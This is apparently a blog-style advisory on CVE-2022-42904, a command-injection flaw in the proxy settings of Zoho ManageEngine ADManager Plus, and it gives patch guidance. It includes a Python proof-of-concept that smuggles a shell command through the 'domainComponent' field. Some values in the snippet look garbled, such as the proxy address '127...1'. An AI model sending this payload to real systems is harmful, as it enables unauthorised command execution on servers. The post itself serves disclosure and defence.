Security vulnerabilities are continuously identified and addressed to keep software applications and the data they manage secure. One such vulnerability has been discovered recently in Zoho ManageEngine ADManager Plus versions up to 7151. In this long-read post, we will delve deep into the details of CVE-2022-42904, a critical vulnerability that allows authenticated admin users to execute commands in proxy settings, leading to a potential compromise in system integrity.

Description

Zoho ManageEngine ADManager Plus is a popular administration and management solution that simplifies Active Directory Management tasks. Recently, it was discovered that the software contains a critical vulnerability affecting the proxy settings functionality.

This vulnerability allows authenticated admin users to execute arbitrary commands in the context of the vulnerable application. A malicious user exploiting this vulnerability can potentially gain full control over the affected system and, in some cases, exfiltrate sensitive data, carry out further attacks, or misuse the compromised system.

Exploit Details

The vulnerability exists in the proxy settings feature provided by Zoho ManageEngine ADManager Plus. An authenticated admin user can send a specially crafted request containing arbitrary commands, which the server processes, eventually leading to command execution.

Here's an illustrative code snippet, showcasing how a vulnerable request with malicious commands could be crafted:

import requests

# Replace with target URL, admin credentials, and desired command
target_url = 'http://example.com';
username = 'admin'
password = 'password'
command = 'whoami'

payload = {
    "Save": "Save",
    "action": "checkHostAndPortAvailability",
    "isHttp": "false",
    "proxyAddress": "127...1",
    "proxyPort": "808",
    "proxyUserName": "",
    "proxyPassword": "",
    "domainComponent": "; {};".format(command),
    "proxyProtocol": "http"
}

session = requests.Session()
session.auth = (username, password)

response = session.post(target_url + '/proxyconfig.do', data=payload)
print(response.text)

To exploit the vulnerability, an attacker would need to replace the target_url, username, password, and command values with the relevant information.

Important Note: The provided code snippet is for demonstration purposes only and should not be used with malicious intent.

Mitigations

To mitigate this vulnerability, users of Zoho ManageEngine ADManager Plus should update their software installations to the latest version available. The patch addressing this vulnerability is included in version 7152 and later. Check the following official resources for further updates and guidance:

- Zoho ManageEngine ADManager Plus Product Page: https://www.manageengine.com/products/ad-manager/
- Security Advisories: https://www.manageengine.com/products/ad-manager/security-advisories.html

Conclusion

Keeping your software updated and promptly patching discovered vulnerabilities is crucial to maintaining the highest levels of security for both your application and the data it handles. By understanding the details of CVE-2022-42904 and applying appropriate updates as recommended, you can better protect your Zoho ManageEngine ADManager Plus installation from potential threats and maintain a safe and secure system environment.

Timeline

Published on: 11/18/2022 21:15:00 UTC
Last modified on: 11/22/2022 16:13:00 UTC